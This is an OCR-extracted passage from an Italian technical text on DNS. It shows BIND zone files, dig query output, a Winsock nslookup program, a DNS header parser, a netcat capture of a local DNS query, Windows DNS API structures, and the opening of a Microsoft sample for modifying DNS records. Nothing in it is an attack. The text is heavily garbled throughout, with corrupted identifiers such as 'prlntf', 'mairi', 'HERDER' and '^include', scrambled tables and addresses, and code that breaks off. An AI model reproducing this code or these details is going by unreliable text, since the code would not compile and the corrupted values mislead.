file "root.hints"; 

}; 

zone "websitek.it" { 
type master; 
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file "pz/websitekit . zone "; 

}; 

zone "0.0. 127. in-addr. arpa" { 
type master; 
file "pz/127.0.0"; 

}; 

In questo file vengono fatte alcune specifiche generali sulla strutturazione del DNS ma la 
più importante è quella che dice che il file .zone che gestisce un certo dominio è uno. 
Ad esempio websitekit.zone sarebbe i file che contiene in effetti tutte le informazioni della 
zona del DNS. 



& IN 


SOA 




dns.websitek.it. hostmaster.websitek.it. ( 

199802151 ; serial, todays date + todays serial # 








8H 


; refresh, seconds 








2H 


; retry, seconds 








1W 


; expire, seconds 








1D ) 


; minimum, seconds 


r 


NS 




dns 


; Inet Address of name server 




MX 




10 mail 


websitek.it. ; Primary Mail Exchanger 




MX 




20 mail 


friend . bogus . ; Secondary Mail Exchanger 


r 

localhost 




A 


127 


0.0.1 


dns 




A 


192 


168.196.2 


mail 




A 


192. 


168.196.2 


www 




A 


192.168.196.2 



Se caso mai ci fossero più domini esisterebbero più file .zone con dentro le stesse 
informazioni relative ad un certo dominio. 

Queste informazioni strutturate dentro a questi file (fate attenzione che qui ho voluto solo 

far capire il concetto e non sono andato nelle profondità dell'argomento) possono essere 

poi usate da software di gestione dei vari WEB Server e Mail Server. 

Ad esempio anni fa se un sistema eseguiva hosting per conto terzi doveva avere 

necessariamente un IP relativo a ogni dominio o web server gestito. 

Nella nuova versione del protocollo http il nome del sistema richiesto 

( www.websitek.com) viene passato nell'header per cui i nuovi WEB Server possono 

gestire Server virtuali. 

In altre parole è possibile gestire su un solo IP diversi URL internet. 

Ad esempio WEBSITEK.COM sulP IP 212.210.165.130 gestisce www.websitek.com , 

www.gandolifan.com , www.casadellauto.com , ecc. 

Questa gestione dei server virtuali viene fatta tramite il WEB Server come ad esempio 
Apache o MS Microsoft. 

Il primo in possiede la specifica VirtualServer mentre il secondo permette di specificare il 
contenuto dell'header http. 

Esiste un altro programma molto utilizzato per ricavare informazioni legate ai DNS e 
precisamente DIG (Domain Information Groper). 
Un esempio di uso di DIG è quello che segue : 

tower:~$ dig @ns . adnc . coiti FreeSoft.org mx 

[I] ; «» DiG 2.1 «» §ns. adnc.com FreeSoft.org mx 
[2] ; (1 server found) 

[3] ;; res options : init recurs defnam dnsrch 

[4 ] ; ; got answer : 

[5] ;; -»HEADER«- opcode : QUERY, status: NOERROR, id: 10 

[6] ; ; flags: qr aa rd ra; Ques: 1, Ans : 1, Auth: 2, Addit : 2 

[7] ; ; QUESTIONS: 

[8] ; ; FreeSoft.org, type = MX, class = IN 

[91 

[10] ; ; ANSWERS: 

[II] FreeSoft.org. 86400 MX 100 mail.adnc.com. 
[12] 

[13] ; ; AUTHORITY RECORD S : 
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[14] 


FreeSoft . org . 86400 


NS 


ns . adnc. com. 


[15] 


FreeSoft . org . 86400 


NS 


ns2 . adnc . com . 


[16] 








[17] 


; ; ADDITIONAL RECORD S : 






[18] 


ns.adnc.com. 86400 


A 


205.216.138.22 


[19] 


ns2.adnc.com. 86400 


A 


205.216.138.24 


[20] 








[21] 


;; Total query time: 464 msec 


[22] 


; ; FROM: tower to SERVER: ns . 


adnc.com 205 .216 .138 .22 


[23] 


; ; WHEN: Tue Mar 19 20 


31:58 


1996 



Il principale argomento è FreeSoft.org .ovvero il nome del dominio. 

L'argomento specificato con @ns. adnc.com è opzionale e rappresenta un nameserver da 

interrogare. 

Gli ultimi argomenti specificano il tipo di query, in questo caso rivolta ad avere come 
risposta i records MX (mail exchange). 

Una volta scoperto che mail.adnc.com è il mail exchange del dominio, possiamo 
richiedere il suo IP. 



tower : ~$ dig @ns . adnc. com mail. adnc. 


com 










[1] 


; «» DiG 2.1 «» §ns 


. adnc . com mail . adnc . com 






[2] 


; (1 server found) 














[3] 


;; res options: init recurs defnam dnsrch 








[4] 


; ; got answer: 














[5] 


; ; —»HEADER«— opcode : 


QUERY, 


status: 


N0ERR0R, 


id: 


10 


[6] 


;; flags: qr aa rd ra; 


Ques : 1 , 


Ans : 2, 


Auth: 3, 


Addit: 3 


[7] 


;; QUESTIONS: 














[8] 


; ; mail . adnc . com, 


type = A 


, class 


= IN 








[9] 
















[10] 


; ; ANSWERS: 














[11] 


mail.adnc.com. 86400 


CNAME 


gemini . 


adnc. 


com. 






[12] 


gemini . adnc . com . 


86400 


A 


205. 


216. 


138 


22 


[13] 
















[14] 


;; AUTHORITY RECORDS: 














[15] 


adnc.com. 86400 


NS 


gemini . 


adnc. 


com. 






[16] 


adnc.com. 86400 


NS 


taurus. 


adnc. 


com. 






[17] 


adnc.com. 86400 


NS 


ns . mei . 


net . 








[18] 
















[19] 


; ; ADDITIONAL RECORDS: 














[20] 


gemini . adnc . com . 


86400 


A 


205. 


216. 


138 


22 


[21] 


taurus . adnc . com . 


86400 


A 


205. 


216. 


138. 


24 


[22] 


ns.mci.net. 161123 


A 


204. 70. 


128.1 








[23] 
















[24] 


; ; Total query time: 310 msec 












[25] 


; ; FROM: tower to SERVER: ns.adnc.com 


205.216.138.22 


[26] 


; ; WHEN: Tue Mar 19 20: 


33:00 1996 











Da questa query vediamo che mail.adnc.com è un alias per gemini.adnc.com e che l'IP è 
205.216.138.22. 

Esiste una sezione legata ai nameserver autoritativi che risulta essere interessante 
quando ns.adnc.com appare non essere appunto autoritativo per il dominio stesso. 
Un query che ci potrebbe restituire maggiori informazioni in relazione a questo è : 



5 vyger> dig ns.adnc.com 






[1] ; «» DiG 2.0 «» ns. 


adnc. com 




[2 ] ; ; —»HEADER«— opcode 


QUERY , status: 


NOERROR, id: 6 
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[41 


/ / 


QUESTIONS: 










[51 


/ / 


ns.adnc.com, type 


= A, class = 


IN 




r6i 














[71 

L * J 


/ / 


ANSWERS: 










[81 


ns . adnc. com. 54654 


A 


205.216.138 


22 


[91 














[101 




AUTHORITY RECORD S : 










[11 1 




453829 NS 


A 


ROOT-SERVERS 


NET. 




[121 




453829 NS 


H 


ROOT-SERVERS 


NET. 




[131 




453829 NS 


B 


ROOT-SERVERS 


NET. 




/"147 




453829 NS 


C 


ROOT-SERVERS 


NET. 




/"157 




453829 NS 


D 


ROOT-SERVERS 


NET. 




[161 




453829 NS 


E 


ROOT-SERVERS 


NET. 




[171 




453829 NS 


I 


ROOT-SERVERS 


NET. 




[181 




453829 NS 


F 


ROOT-SERVERS 


NET. 




[191 




453829 NS 


G 


ROOT-SERVERS 


NET. 




/"207 
















r r 


ADDITIONAL RECORD S : 










/\22 7 

i **** J 


A. 


ROOT-SERVERS . NET . 


520206 A 


198 


.41.0.4 


/"23 7 


H . ROOT-SERVERS .NET. 


520206 A 


128 


.63.2.53 


[24 1 


B. 


ROOT-SERVERS . NET . 


520206 A 


128 


.9.0. 107 


/\257 


C. 


ROOT-SERVERS . NET. 


520206 A 


192 


.33.4.12 




D. 


ROOT-SERVERS . NET. 


520206 A 


128 


.8.10.90 


/"27 7 


E. 


ROOT-SERVERS . NET. 


520206 A 


192 


.203.230.10 


/"2S7 


I. 


ROOT-SERVERS . NET. 


520206 A 


192 


.36.148.17 




F. 


ROOT-SERVERS . NET . 


520206 A 


192 


.5.5.241 


f30J 


G. 


ROOT-SERVERS . NET. 


520210 A 


192 


.112.36.4 


f31J 














/"32V 


/ r 


Ssnt 1 pkts, answer 


found in time: 330 msec 


f337 


r r 


FROM: vyger to SERVER: 


default — 127.0. 


0.1 


f347 


r r 


WHEN: Fri Sep 6 16 


38 


22 1996 






f357 


r r 


MSG SIZE ssnt: 29 


rcvd: 340 







Un discorso particolare deve essere fatto per quanto riguarda il sistema di ricerca inversa 
ovvero quella che partendo dalla specifica di un indirizzo permette di risalire al nome del 
server. 

Il settaggio di questo file destinato ala ricerca inversa è usato quando un client dispone 
già di un indirizzo IP di un computer e desidera determinare il nome DNS di questo. 
In ogni caso esistono molte funzioni presenti nella libreria SOCKET che permettono con 
poche righe di programmazione di scriversi le funzioni per l'esecuzione di certi tipi di 
analisi come ad esempio quelle offerte da NSLOOKUP. 

La conversione da stringa ad ip o viceversa possono essere eseguite tranquillamente 
grazie a due funzioni specifiche ovvero : 




Il seguente codice scritto dentro ad una funzione inserisce i dati dentro alle due stringhe 
passate come argomenti. 

Il seguente programma può essere facilmente scritto richiedendo a Visual Studio di 
creare un applicativo Console WIN32 con supporto MFC. 

Successivamente si valuta l'argomento e a seconda che sia un IP specificato nella forma 
xxx.xxx.xxx.xxx oppure come host nella forma nomehost è richiamiamo la prima funzione 
oppure la seconda. 

// nslookup . cpp : Defines the entry point for the console application. 

// 

^include "stdafx.h" 
# include "nslookup. h" 
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tiifdef _DEBUG 
tidefine new DEB UG_NEW 
#undef THIS_FILE 

statlc char THIS_FILE[] = FILE ; 

iendif 

///////////////////////////////////////////////////////////////////////// 
//// 

// The one and only application object 

CWinApp theApp; 

using namespace std; 

^include "stdio.h" 

^include "stdlib.h" 

iinclude "string.h" 

^include "winsock2 .h" 

# include "conio . h" 



WORD wVersionRequested; 
WSADATA wsaData; 
int err; 

int winsockOn() 
{ 

wVersionRequested = MAKEWORD (2, 0 ) ; 

err = WSAStartup (wVersionRequested, SwsaData ); 

if( err != 0 ) { 

return FALSE; 

} 

if (LOBYTE ( wsaData. wVersion ) != 2 / / HI BYTE ( wsaData. wVersion ) 

'■= 0 ) { 

WSACleanup ( ) ; 
return FALSE; 

} 

return TRUE; 

} 



int winsockOfff) 
{ 

WSACleanup () ; 
return TRUE; 

} 



char nslookuperr [256] ; 

int nslookup (char *ip_or_host, char *ip, int iplen, char *host, int 

hostlen) 

{ 

struct in_addr inaddr; 
struct hostent *hent; 

*ip=0; 
*host=0; 



// Trasla la stringa in un ip di 32-bit (dword) . 
inaddr . s_addr = inet_addr (ip_or_host) ; 

// Sela funzione di prima ha sbagliato significa che non era un 

IP 

// ma una stringa di un HOST e quindi va sulle istruzioni che 
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// dal nome dell 'host 
lf(lnaddr.s_addr == INADDR_NONE) 
{ 

// Richiediamo l'IP partendo dal nome (ad es . 

localhost) 

if( (hent = gethostbyname (ip_or_host) ) == NULL ) 
{ 

/ /error 

sprint f (nslookuperr, "gethostbyname (Winsock 
error %d) ", WSAGetLastError () ) ; 

return FALSE; 

} 

else 

{ 

_snprintf (ip, iplen, "%s", inet_ntoa (*( (struct in_addr 
*)hent->h_addr) ) ) ; 

_snprintf (host, hostlen, "%s", hent->h_name) ; 
} 

ì 

else 
{ 

// Se arriva qui abbiamo specificato un indirizzo 
if( (hent = gethostbyaddr ( (char *)&inaddr, sizeof (struct 
in_addr) , AF_INET) ) == NULL ) 
{ 

/ /error 

sprint f (nslookuperr, "gethostbyaddr (Winsock 
error %d) ", WSAGetLastError () ) ; 

return FALSE; 

} 

else 

{ 

_snprintf (ip, iplen, "%s", ip_or_host) ; 
_snprintf (host , hostlen, "%s", hent->h_name) ; 

} 

} 

return TRUE; 

} 



int _tmain (int argc, TCHAR* argv[] , TCHAR* envp[]) 
{ 

int nRetCode = 0; 
char iphost [80 ] ; 

char ipbuffer[256] , hostbuffer [256] ; 

if(! winsockOn () ) 

return 0; 
cout « "Hostname or IP : " ; 
cin » iphost; 

// initialize MFC and print and error on failure 
if ( !AfxWinInit ( : : GetModuleHandle (NULL) , NULL, 
: : GetCommandLine () , 0) ) 
{ 

cerr « _T ("Fatai Error: MFC initialization failed") « 

endl; 

nRetCode = 1; 

} 

else 
{ 

nslookup ( (char *) iphost, ipbuffer, sizeof (ipbuffer) , 
hostbuffer, sizeof (hostbuffer) ) ; 

cout « _T("\n") « ipbuffer « _T("\n") ; 
cout « hostbuffer « _T("\n") ; 
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±f(!w±nsockOff() ) 
return 0; 




In CPPBUILDER esistono alcuni componenti che vengono distribuito tra lo shareware o il 
freeware che permettono al creazione di programmi orientati alla gestione del DNS 
usando il metodo dei VCL e quindi semplificando notevolmente la vita a chi non ha una 
eccessiva dimestichezza con la programmazione. 

Il sistema del DNS utilizza la porta 53 e il formato dei pacchetti è quello che segue : 



llllll 
0123456789012345 
+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 
/ ID I 

+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 
IQRI Opcode /AA/ TC/RD IRA/ Z / RCODE / 

+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 
/ QDCOUNT I 

+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 
/ ANCOUNT I 

+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 
/ NSCOUNT I 

+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 
/ ARCOUNT I 

+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 



where: 



ID A 1 6 bit identifier assigned by the program that 

generates any kind of query. This identifier is copied 
the corresponding reply and can be used by the requester 
to match up replies to outstanding queries. 

QR A one bit field that specifies whether this message is a 

query (0), or a response (1). 

OPCODE A four bit field that specifies kind of query in this 

message. This value is set by the originator of a query 
and copied into the response. The values are: 

0 a standard query (QUERY) 

1 an inverse query (IQUERY) 

2 a server status request (STATUS) 
3-1 5 reserved for future use 



AA Authoritative Answer - this bit is valid in responses, 

and specifies that the responding name server is an 
authority for the domain name in question section. 
Note that the contents of the answer section may have 
multiple owner names because of aliases. The AA bit 
corresponds to the name which matches the query name, or 
the first owner name in the answer section. 



TC Truncation - specifies that this message was truncated 
due to length greater than that permitted on the 
transmission channel. 



RD Recursion Desired - this bit may be set in a query and 
is copied into the response. If RD is set, it directs 
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the name server to pursue the query recursively. 
Recursive query support is optional. 

RA Recursion Available - this be is set or cleared in a 

response, and denotes whether recursive query support is 
available in the name server. 

Z Reserved for future use. Must be zero in ali queries 

and responses. 

RCODE Response code - this 4 bit field is set as part of 
responses. The values have the following 
interpretation: 

0 No error condition 

1 Format error - The name server was 
unable to interpret the query. 

2 Server failure - The name server was 
unable to process this query due to a 
problem with the name server. 

3 Name Error - Meaningful only for 
responses from an authoritative name 
server, this code signifies that the 
domain name referenced in the query does 
not exist. 

4 Not Implemented - The name server does 
not support the requested kind of query. 

5 Refused - The name server refuses to 
perform the specified operation for 
policy reasons. For example, a name 
server may not wish to provide the 
information to the particular requester, 

or a name server may not wish to perform 
a particular operation (e.g., zone 
transfer) for particular data. 
6-15 Reserved for future use. 

QDCOUNT an unsigned 1 6 bit integer specifying the number of 
entries in the question section. 

ANCOUNT an unsigned 16 bit integer specifying the number of 
resource records in the answer section. 

NSCOUNT an unsigned 1 6 bit integer specifying the number of name 
server resource records in the authority records 
section. 

ARCOUNT an unsigned 1 6 bit integer specifying the number of 
resource records in the additional records section. 

Dove le ultime 4 sezioni hanno delle lunghezze variabili. 
La QUERY invece ha il seguente formato : 



111111 
0123456789012345 
+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 

/ / 
/ QNAME / 

/ / 
+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 
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/ QTYPE I 

+ — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + — + 

/ QCLASS I 



where: 

QNAME a domain name represented as a sequence of 

labels, where each label consists of 

length 

octet followed by that number of octets. 
The 

domain name terminates with the zero 
length octet for the nuli label of the 
root . Note 

that this field may be an odd number of 
octets; no padding is used. 

QTYPE a two octet code which specifies the type 

of 

the query. The values for this field 

include 

ali codes valid for a TYPE field, together 
with some more general codes which can 

more than one type of RR. 



match 



QCLASS a two octet code that specifies the class 

of 

the query. For example, the QCLASS field 

is 

IN for the Internet 

Il seguente codice mostra il parsing della struttura DNS. 

^include <arpa/nameser.h> 

int mairi () { 

struct sockaddr_in s_in; 
HERDER *dnsheader; 
char buf[PACKETSZ] ; 
int fd; 

/* Insert your code here, socket(), etc */ 

recv (fd, &buf, sizeof (buf) , 0) ; 

dnsheader = (HEADER *) &buf; 

printf ("Dumping DNS packet header : \n" ) ; 

printf ("ID = %x, response = %s, opcode = ", ntohs (dnsheader->id) , 
(dnsheader->qr ? "yes" : "no")); 

switch (dnsheader->opcode) 
{ 

case 0 : 

printf ("standard query\n") ; 

break; 

case 1 : 

printf ("inverse query\n") ; 
break; 
de fault : 

printf ( "undefined\n ") ; 
break; 
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prlntf ("Flags: %s %s %s %s\n", ( (dnsheader->aa) ? "authoritative 
answer, \t" : ""), 

( (dnsheader->tc) ? "truncated message, \t" : ""), ( (dnsheader->rd) ? 
"recurslon deslred, " : " ") , 

( (dnsheader->ra) ? "recurslon available\t" : "")); 

if (dnsheader->qr) 



{ 



prlntf ("Response code - ") ; 



swltch (dnsheader->rcode) 



{ 



case 0 : 

prlntf ("no error\n") ; 

break; 
case 1 : 

prlntf ("format error\n") ; 

break; 
case 2: 

prlntf ("server failure\n") ; 
break; 
case 3: 

prlntf ("non existent domaln\n") ; 
break; 
case 4 : 

prlntf ("not implemented\n" ) ; 
break; 
case 5: 

prlntf ("query refused\n") ; 
break; 
de fault : 

prlntf ( "undeflned\n ") ; 



break; 



} 



} 



prlntf ("Questlon # - %d, Answer # - %d, NS # - %d, Addltlonal # - %d\n" , 
ntohs (dnsheader->qdcount) , ntohs (dnsheader->ancount) , ntohs 
(dnsheader->nscount) , ntohs (dnsheader->arcount) ) ; 



In ambiente UNIX la gestione del DNS viene fatta dal programma named. 

Per schiarirci le idee, in ambiente Linux, possiamo eseguire le seguenti istruzioni per eseguire 

il dump di una richiesta sul DNS. 



# killall named 

# netcat -1 -p 53 -u -o dump &; \ 
host —t A test.domain.com 
localhost ; 

Some output 



JonesTown:/§ cat dump 

< 00000000 45 Ih 01 00 00 01 00 00 00 00 00 00 04 74 65 73 # E tes 

< 00000010 74 06 64 6f 6d 61 69 6e 03 63 6f 6d 00 00 01 00 # t. domain.com 

< 00000020 01 
JonesTown : / § 



45 lb 01 00 00 01 00 00 00 00 00 00 04 74 65 73 74 06 64 6f 6d 61 69 6e 03 63 6f 6d 00 

I / / / 

The DNS packet header (12 bytes) Actual DNS request 



00 01 00 01 




Quella che segue invece è la struttura di una replica dns 
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Byte 

I / / / 

1 2 3 4 . . x-1 

Name (Variable length) 

! / / / 

x x+1 x+2 x+3 

Type (Cont) Class (Cont) 

I / / / 

x+4 x+5 x+6 x+7 

TTL (Cont) (Cont) (Cont) 

I , , / 

x+8 x+9 x+10 . . y (Variable length) 

RDLength (Cont) RData (Cont) 

I / / / 



La tipologia QTYPE è la seguente : 



TYPE valus and meanlng 

A la host address 

NS 2 an authoritative name server 

MD 3 a mail destination (Obsolete - use MX) 

MF 4 a mail forwarder (Obsolete - use MX) 

CNAME 5 the canonical name for an alias 

SOA 6 marks the start of a zone of authority 

MB 7 a mailbox domain name (EXPERIMENTAL) 

MG 8 a mail group member (EXPERIMENTAL) 

MR 9 a mail renarne domain name 
(EXPERIMENTAL ) 

NULL 10 a nuli RR (EXPERIMENTAL) 

WKS 11 a well known service description 

PTR 12 a domain name pointer 

HINFO 13 host Information 

MINFO 14 mailbox or mail list information 

MX 15 mail exchange 

TXT 16 text strings 



QTYPE values 



QTYPE fields appear in the question part of a query. QTYPES 
are a superset of TYPEs, hence ali TYPEs are valici QTYPEs. In 
addition, the following QTYPEs are defined: 



AXFR 252 A request for a transfer of an entire 

zone 

MAILB 253 A request for mailbox-related records 

(MB, MG or MR) 
MAILA 254 A request for mail agent RRs 

(Obsolete - 

see MX) 

255 A request for ali records 

In ambiente Windows nell'ambito della fatidica raccolta di SDK eiste una porzione di questi 
che riguarda proprio la gestione dei DNS. 

In questo ambito esistono diverse funzioni adatte alla gestione di questi e precisamente : 



DnsAcquireContextHandle 

DnsExtractRecordsFromMessage 

DnsModifvRecordsInSet 

DnsNameCompare 

DnsQuerv 

DnsQuervConfig 

DnsReleaseContextHandle 
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DnsRecordCompare 

DnsRecordCopyEx 

DnsRecordListFree 

DnsRecordSetCompare 

DnsRecordSetCopyEx 

DnsRecordSetDetach 

DnsReplaceRecordSet 

DnsValidateName 

DnsWriteQuestionToBuffer 



La struttura usata da queste funzioni è la seguente : 



typedef struct _DnsRecord 
{ 



struct 
LPTSTR 
WORD 
WORD 



DnsRecord * 



pNext ; 
pName ; 
wType ; 

wDataLength; 



union 
{ 

DWORD DW ; 
DNS_RECORD_FLAGS S; 



// Not referenced for DNS record 
// types deflned above. 



// flags as DWORD 

// flags as structure 



} Flags; 

DWORD dwTtl; 
DWORD dwReserved; 



// Record Data 



union 
{ 

DNS_A_DATA 
DNS_SOA_DATA 
DNS PTR DATA 



DNS_MINFO_DATA 
DNS_MX_DATA 

DNS TXT DATA 



DNS_ 
DNS_ 
DNS_ 
DNS_ 
DNS_ 
DNS_ 
DNS_ 
DNS_ 
DNS_ 
DNS_ 
DNS_ 
DNS 



NULL_DATA 

WKS_DATA 

AAAA_DATA 

KEY_DATA 

SIG_DATA 

ATMA_DATA 

NXT_DATA 

SRV_DATA 

TKEY_DATA 

TSIG_DATA 

WINS_DATA 

WINSR DATA 



A; 

SOA, Soa; 
PTR, Ptr, 
NS, Ns, 
CNAME, Cname, 
MB, Mb, 
MD, Md, 
MF, Mf, 
MG, Mg, 
MR, Mr; 
MINFO, Minfo, 
RP, Rp; 
MX, Mx, 
AFSDB, Afsdb, 
RT, Rt; 
HINFO, Hinfo, 
ISDN, Isdn, 
TXT, Txt, 
X25; 
Nuli; 
WKS, Wks; 
AAAA; 
KEY, Key; 
SIG, Sig; 
ATMA, Atma; 
NXT, Nxt; 
SRV, Srv; 
TKEY, Tkey; 
TSIG, Tsig; 
WINS, Wins; 

WINSR, WinsR, NBSTAT, Nbstat; 



} Data; 
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DNS_RECORD, *PDNS_RECORD ; 



Members 
pNext 

Pointer to the next DNS_RECORD structure. 

pName 

Domain name of the record set to be updated. Must be in the string format that corresponds to 
the function being called, such as ANSI, UNICODE, or UTF8. 

wType 

DNS record type, in host byte order. Can be any of the following: 



DNS 


TYPE 


A 


DNS 


TYPE 


NS 


DNS 


TYPE 


MD 


DNS 


TYPE 


MF 


DNS 


TYPE 


CNAME 


DNS 


TYPE 


SOA 


DNS 


TYPE 


MB 


DNS 


TYPE 


MG 


DNS 


TYPE 


MR 


DNS 


TYPE 


NULL 


DNS 


TYPE 


WKS 


DNS 


TYPE 


PTR 


DNS 


TYPE 


HINFO 


DNS 


TYPE 


MINFO 


DNS 


TYPE 


MX 


DNS_ 


TYPE 


TEXT 


wDataLength 







Length of the data, in bytes. Fixed length data types, this value is the size of the corresponding 
data type, such as sizeof(DNS_A_DATA). For data types that are not fixed, use one of the 
following macros to determine the size of the data: 
#define DNS_TEXT_RECORD_LENGTH(StringCount) \ 

(sizeof(DWORD) + ((StringCount) * sizeof(PCHAR))) 

#define DNS_NULL_RECORD_LENGTH(ByteCount) \ 
(sizeof(DWORD) + (ByteCount)) 

#define DNS_WKS_RECORD_LENGTH(ByteCount) \ 
(sizeof(DNS_WKS_DATA) + (ByteCount-1)) 

#define DNS_WINS_RECORD_LENGTH(lpCount) \ 

(sizeof(DNS_WINS_DATA) + ((lpCount-1) * sizeof(IP_ADDRESS))) 

DW 

Flags used in the structure, in the form of a bit-wise DWORD. 

S 

Flags used in the structure, in the form of a DNS_RECORD_FLAGS structure. 

dwTtl 

Time to live, in seconds 
dwReserved 

Reserved for future use. 



Se vi doveste trovare nella necessità di manipolare in ambiente WINDOWS queste 

funzionalità ricordatevi dell' esistenza di questo SDK. 

Le classi relative alle varie funzionalità relative ai DNS sono le seguenti : 



Microsoft DNS WMI Class 
MicrosoftDNS Server 



MicrosoftDNS Domain 
MicrosoftDNS Zone 



Description 

Describes a DNS Server. Every instance of this class may be 
associated with one instance of class MicrosoftDNS_Cache, one 
instance of class MicrosoftDNS_RootHints, and multiple instances 
of class MicrosoftDNS_Zone. 

Represents a domain in a DNS hierarchy tree. 

Describes a DNS Zone. Every instance of the class 
MicrosoftDNS_Zone must be assigned to exactly one DNS Server. 
Zones mav be associated with multiDle instances of the classes 
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MicrosoftDNS Cache 



MicrosoftDNS RootHints 



MicrosoftDNS Statistic 

MicrosoftDNS ServerDomainCont 
ainment 

MicrosoftDNS DomainDomainCont 
ainment 

MicrosoftDNS DomainResourceRe 
cordContainment 

MicrosoftDNS ResourceRecord 
MicrosoftDNS AAAAType 

MicrosoftDNS AFSDBType 

MicrosoftDNS ATMAType 

MicrosoftDNS AType 

MicrosoftDNS CNAMEType 

MicrosoftDNS HINFOType 

MicrosoftDNS ISDNType 

MicrosoftDNS KEYType 

MicrosoftDNS MBType 

MicrosoftDNS MDType 

MicrosoftDNS MFType 

MicrosoftDNS MGType 

MicrosoftDNS MINFOType 

MicrosoftDNS MRType 



MicrosoftDNS_Domain and MicrosoftDNS_ResourceRecord. 

Describes a cache existing on a DNS Server (do not confuse this 
with a cache file that contains root hints). This class simplifies 
visualizing the containment of DNS objects, rather than 
representing a real object. The class, MicrosoftDNS_Cache, is a 
container for the resource records cached by the DNS Server. 
Every instance of the class MicrosoftDNS_Cache must be 
assigned to exactly one DNS Server. It may be associated with 
multiple instances of MicrosoftDNS_Domain and 
MicrosoftDNS_ResourceRecord. 

Describes the RootHints stored in a cache file on a DNS Server. 
This class simplifies visualizing the containment of DNS objects, 
rather than representing a real object. Class 
MicrosoftDNS_RootHints is a container for the resource records 
stored by the DNS Server in a cache file. Every instance of the 
class MicrosoftDNS_RootHints must be assigned to exactly one 
DNS Server. It may be associated with multiple instances of the 
MicrosoftDNS_ResourceRecord class. 

Represents a single DNS Server statistic. 

Every instance of the class 

MicrosoftDNS_ServerDomainContainment may contain multiple 
instances of the class MicrosoftDNS_Domain. 

Every instance of the MicrosoftDNS_DomainDomainContainment 
class may contain multiple other instances of 
MicrosoftDNS_Domain. 

Every instance of the class 

MicrosoftDNS_DomainResourceRecordComtainment may contain 
multiple instances of the MicrosoftDNS_ResourceRecord class. 

Represents the general properties of a DNS RR. 

Represents an IPv6 Address (AAAA), often pronounced quad-A, 
RR. Subclass of MicrosoftDNS_ResourceRecord. 

Represents an Andrew File System Database Server (AFSDB) RR. 
Subclass of MicrosoftDNS_ResourceRecord. 

Represents an ATM Address-to-Name (ATMA) RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents an Address (A) RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents a Canonical Name (CNAME) RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents a Host Information (HINFO) RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents an ISDN RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents a KEY RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents a Mailbox (MB) RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents a Mail Agent for Domain (MD) RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents a Mail Forwarding Agent for Domain (MF) RR. 
Subclass of MicrosoftDNS_ResourceRecord. 

Represents an MG RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents an Mail Information (MINFO) RR. Subclass of 
MicrosoftDNS_ResourceRecord. 

Represents a Mailbox Renarne (MR) RR. Subclass of 
MicrosoftDNS ResourceRecord. 
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MicrosoftDNS MXType Represents a Mail Exchanger (MX) RR. Subclass of 

MicrosoftDNS_Resou ree Record . 

MicrosoftDNS NSType Represents a Name Server (NS) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS NXTType Represents a Next (NXT) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS PTRTvpe Represents a Pointer (PTR) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS RPTvpe Represents a Responsible Person (RP) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS RTTvpe Represents a Route Through (RT) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS SIGType Represents a Signature (SIG) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS SOAType Represents a Start Of Authority (SOA) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS SRVType Represents a Service (SRV) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS TXTType Represents a Text (TXT) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS WINSRType Represents a WINS-Reverse (WINSR) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS WINSType Represents a WINS RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS WKSType Represents a Well-Known Service (WKS) RR. Subclass of 

MicrosoftDNS_ResourceRecord. 

MicrosoftDNS X25Type Represents an X.25 (X25) RR. Subclass of 

MicrosoftDNS Resou ree Record. 



Il seguente sorgente serve a modificare un record del DNS dentro ad un sistema Windows. 
Risulta essere una programmino piccolo e veloce da lanciare anche da linea di comando per 
cui facilmente utilizzabile per modificare a proprio piacere un determinato record. 

/************************************************************\ 

THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF 
ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED TO 
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A 
PARTICULAR PURPOSE . 

Copyright © 2000 Microsoft Corporation. Ali Rights Reserved. 
/*************************************************************** 



/* 

FILE : ModifyRecords . epp 

DESCRIPTION : This sample illustrates how to add Host Address ( A) and 
CNAME resource records 

to DNS server using DNSModifyRecordsInSet () API. 



PLATFORM: 
WRITTEN BY: 
DATE: 



Windows 2000 
Rasnmi Anoop 
3/22/2000 



*/ 
/* 

include s 

*/ 
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^include <w±ndows.h> //wlndows 

^include <w±ndns . h> //DNS api ' s 

^include <stdio.h> //standard i/o 

# include <winsock.h> //winsock 

//Usage of the program 

void Usage (char *progname) { 

fprintf (stderr, "Usage\n%s -n [OwnerName] - t [Type] -1 [Ttl] -d [Data] - 
s [DnsServerlp ]\n" , 
progname) ; 

